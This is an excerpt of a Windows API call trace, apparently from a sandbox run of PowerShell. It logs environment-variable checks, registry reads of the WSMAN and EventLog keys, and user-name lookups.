	[0297.733] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0297.733] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.733] CoTaskMemFree (pv=0x329c00) 
	[0297.735] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0297.735] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.735] CoTaskMemFree (pv=0x329c00) 
	[0297.736] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0297.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.736] CoTaskMemFree (pv=0x329c00) 
	[0297.738] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0297.738] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.738] CoTaskMemFree (pv=0x329c00) 
	[0297.745] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0297.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.745] CoTaskMemFree (pv=0x329c00) 
	[0297.749] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0297.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.749] CoTaskMemFree (pv=0x329c00) 
	[0297.749] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0297.749] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.749] CoTaskMemFree (pv=0x329c00) 
	[0297.753] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad338 | out: phkResult=0x1ad338*=0x32c) returned 0x0
	[0297.754] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad23c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad238, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad23c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad238*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0297.754] CoTaskMemFree (pv=0x0) 
	[0297.755] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0297.755] RegEnumValueW (in: hKey=0x32c, dwIndex=0x0, lpValueName=0x383920, lpcchValueName=0x1ad2e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ad2e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0297.755] CoTaskMemFree (pv=0x383920) 
	[0297.755] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0297.755] RegEnumValueW (in: hKey=0x32c, dwIndex=0x1, lpValueName=0x383920, lpcchValueName=0x1ad2e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ad2e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0297.755] CoTaskMemFree (pv=0x383920) 
	[0297.755] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0297.755] RegEnumValueW (in: hKey=0x32c, dwIndex=0x2, lpValueName=0x383920, lpcchValueName=0x1ad2e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ad2e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0297.755] CoTaskMemFree (pv=0x383920) 
	[0297.755] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad2cc, lpData=0x0, lpcbData=0x1ad2c8*=0x0 | out: lpType=0x1ad2cc*=0x1, lpData=0x0, lpcbData=0x1ad2c8*=0x8) returned 0x0
	[0297.756] CoTaskMemAlloc (cb=0xc) returned 0x3ef870
	[0297.756] RegQueryValueExW (in: hKey=0x32c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad29c, lpData=0x3ef870, lpcbData=0x1ad298*=0x8 | out: lpType=0x1ad29c*=0x1, lpData="2.0", lpcbData=0x1ad298*=0x8) returned 0x0
	[0297.756] CoTaskMemFree (pv=0x3ef870) 
	[0298.468] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad288 | out: phkResult=0x1ad288*=0x300) returned 0x0
	[0298.468] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad18c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad188*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0298.468] CoTaskMemFree (pv=0x0) 
	[0298.469] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.469] RegEnumValueW (in: hKey=0x300, dwIndex=0x0, lpValueName=0x383920, lpcchValueName=0x1ad238, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1ad238, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0298.469] CoTaskMemFree (pv=0x383920) 
	[0298.469] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.469] RegEnumValueW (in: hKey=0x300, dwIndex=0x1, lpValueName=0x383920, lpcchValueName=0x1ad238, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1ad238, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0298.469] CoTaskMemFree (pv=0x383920) 
	[0298.469] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.469] RegEnumValueW (in: hKey=0x300, dwIndex=0x2, lpValueName=0x383920, lpcchValueName=0x1ad238, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1ad238, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0298.469] CoTaskMemFree (pv=0x383920) 
	[0298.469] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad21c, lpData=0x0, lpcbData=0x1ad218*=0x0 | out: lpType=0x1ad21c*=0x1, lpData=0x0, lpcbData=0x1ad218*=0x8) returned 0x0
	[0298.469] CoTaskMemAlloc (cb=0xc) returned 0x3ef310
	[0298.469] RegQueryValueExW (in: hKey=0x300, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ad1ec, lpData=0x3ef310, lpcbData=0x1ad1e8*=0x8 | out: lpType=0x1ad1ec*=0x1, lpData="2.0", lpcbData=0x1ad1e8*=0x8) returned 0x0
	[0298.469] CoTaskMemFree (pv=0x3ef310) 
	[0298.470] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0298.470] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.470] CoTaskMemFree (pv=0x329c00) 
	[0298.472] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0298.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0298.472] CoTaskMemFree (pv=0x329c00) 
	[0298.474] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2b8 | out: phkResult=0x1ad2b8*=0x304) returned 0x0
	[0298.478] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad22c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad228, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad22c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad228*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0298.478] CoTaskMemFree (pv=0x0) 
	[0298.479] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.479] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x0, lpName=0x383920, lpcchName=0x1ad2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0298.479] CoTaskMemFree (pv=0x383920) 
	[0298.479] CoTaskMemFree (pv=0x0) 
	[0298.479] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.479] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x1, lpName=0x383920, lpcchName=0x1ad2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0298.479] CoTaskMemFree (pv=0x383920) 
	[0298.479] CoTaskMemFree (pv=0x0) 
	[0298.479] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.479] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x2, lpName=0x383920, lpcchName=0x1ad2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0298.480] CoTaskMemFree (pv=0x383920) 
	[0298.480] CoTaskMemFree (pv=0x0) 
	[0298.480] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.480] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x3, lpName=0x383920, lpcchName=0x1ad2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0298.480] CoTaskMemFree (pv=0x383920) 
	[0298.480] CoTaskMemFree (pv=0x0) 
	[0298.480] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.480] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x4, lpName=0x383920, lpcchName=0x1ad2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0298.480] CoTaskMemFree (pv=0x383920) 
	[0298.480] CoTaskMemFree (pv=0x0) 
	[0298.480] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.480] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x5, lpName=0x383920, lpcchName=0x1ad2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0298.480] CoTaskMemFree (pv=0x383920) 
	[0298.480] CoTaskMemFree (pv=0x0) 
	[0298.480] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.480] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x6, lpName=0x383920, lpcchName=0x1ad2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0298.480] CoTaskMemFree (pv=0x383920) 
	[0298.480] CoTaskMemFree (pv=0x0) 
	[0298.480] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.480] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x7, lpName=0x383920, lpcchName=0x1ad2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0298.480] CoTaskMemFree (pv=0x383920) 
	[0298.480] CoTaskMemFree (pv=0x0) 
	[0298.480] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.480] RegEnumKeyExW (in: hKey=0x304, dwIndex=0x8, lpName=0x383920, lpcchName=0x1ad2b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad2b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0298.480] CoTaskMemFree (pv=0x383920) 
	[0298.480] CoTaskMemFree (pv=0x0) 
	[0298.481] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x308) returned 0x0
	[0298.481] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x0) returned 0x2
	[0298.481] RegOpenKeyExW (in: hKey=0x304, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x31c) returned 0x0
	[0298.481] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x0) returned 0x2
	[0298.481] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x330) returned 0x0
	[0298.481] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x0) returned 0x2
	[0298.481] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x334) returned 0x0
	[0298.481] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x0) returned 0x2
	[0298.481] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x338) returned 0x0
	[0298.481] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x0) returned 0x2
	[0298.482] RegOpenKeyExW (in: hKey=0x304, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x33c) returned 0x0
	[0298.482] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x0) returned 0x2
	[0298.482] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x340) returned 0x0
	[0298.482] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x0) returned 0x2
	[0298.482] RegOpenKeyExW (in: hKey=0x304, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x344) returned 0x0
	[0298.482] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x0) returned 0x2
	[0298.482] RegOpenKeyExW (in: hKey=0x304, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x348) returned 0x0
	[0298.482] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad318 | out: phkResult=0x1ad318*=0x34c) returned 0x0
	[0298.482] RegCloseKey (hKey=0x34c) returned 0x0
	[0298.483] RegCloseKey (hKey=0x304) returned 0x0
	[0298.483] RegCloseKey (hKey=0x348) returned 0x0
	[0298.491] CoTaskMemAlloc (cb=0x804) returned 0x1b7022f0
	[0298.492] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7022f0, nSize=0x1ad528 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad528) returned 0x1
	[0298.493] CoTaskMemFree (pv=0x1b7022f0) 
	[0298.494] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0298.494] GetUserNameW (in: lpBuffer=0x383920, pcbBuffer=0x1ad568 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad568) returned 1
	[0298.494] CoTaskMemFree (pv=0x383920) 
	[0299.388] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad268 | out: phkResult=0x1ad268*=0x350) returned 0x0
	[0299.388] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad1dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad1d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad1dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad1d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.388] CoTaskMemFree (pv=0x0) 
	[0299.388] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.388] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.388] CoTaskMemFree (pv=0x383920) 
	[0299.388] CoTaskMemFree (pv=0x0) 
	[0299.388] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.389] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.389] CoTaskMemFree (pv=0x383920) 
	[0299.389] CoTaskMemFree (pv=0x0) 
	[0299.389] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.389] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.389] CoTaskMemFree (pv=0x383920) 
	[0299.389] CoTaskMemFree (pv=0x0) 
	[0299.389] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.389] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.389] CoTaskMemFree (pv=0x383920) 
	[0299.389] CoTaskMemFree (pv=0x0) 
	[0299.389] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.389] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.389] CoTaskMemFree (pv=0x383920) 
	[0299.389] CoTaskMemFree (pv=0x0) 
	[0299.389] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.389] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.389] CoTaskMemFree (pv=0x383920) 
	[0299.389] CoTaskMemFree (pv=0x0) 
	[0299.389] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.389] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.389] CoTaskMemFree (pv=0x383920) 
	[0299.389] CoTaskMemFree (pv=0x0) 
	[0299.390] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.390] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.390] CoTaskMemFree (pv=0x383920) 
	[0299.390] CoTaskMemFree (pv=0x0) 
	[0299.390] CoTaskMemAlloc (cb=0x204) returned 0x383920
	[0299.390] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x8, lpName=0x383920, lpcchName=0x1ad268, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1ad268, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.390] CoTaskMemFree (pv=0x383920) 
	[0299.390] CoTaskMemFree (pv=0x0) 
	[0299.390] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x354) returned 0x0
	[0299.390] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.390] RegOpenKeyExW (in: hKey=0x350, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x358) returned 0x0
	[0299.390] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.390] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x35c) returned 0x0
	[0299.390] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.391] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x360) returned 0x0
	[0299.391] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.391] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x364) returned 0x0
	[0299.391] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.391] RegOpenKeyExW (in: hKey=0x350, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x368) returned 0x0
	[0299.391] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.391] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x36c) returned 0x0
	[0299.391] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.392] RegOpenKeyExW (in: hKey=0x350, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x370) returned 0x0
	[0299.392] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x0) returned 0x2
	[0299.392] RegOpenKeyExW (in: hKey=0x350, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x374) returned 0x0
	[0299.392] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad2c8 | out: phkResult=0x1ad2c8*=0x378) returned 0x0
	[0299.392] RegCloseKey (hKey=0x378) returned 0x0
	[0299.392] RegCloseKey (hKey=0x350) returned 0x0
	[0299.393] RegCloseKey (hKey=0x374) returned 0x0
	[0299.393] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad268 | out: phkResult=0x1ad268*=0x374) returned 0x0
	[0299.393] RegQueryInfoKeyW (in: hKey=0x374, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ad1dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad1d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ad1dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ad1d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0299.393] CoTaskMemFree (pv=0x0) 
	[0299.394] CoTaskMemAlloc (cb=0x204) returned 0x383920
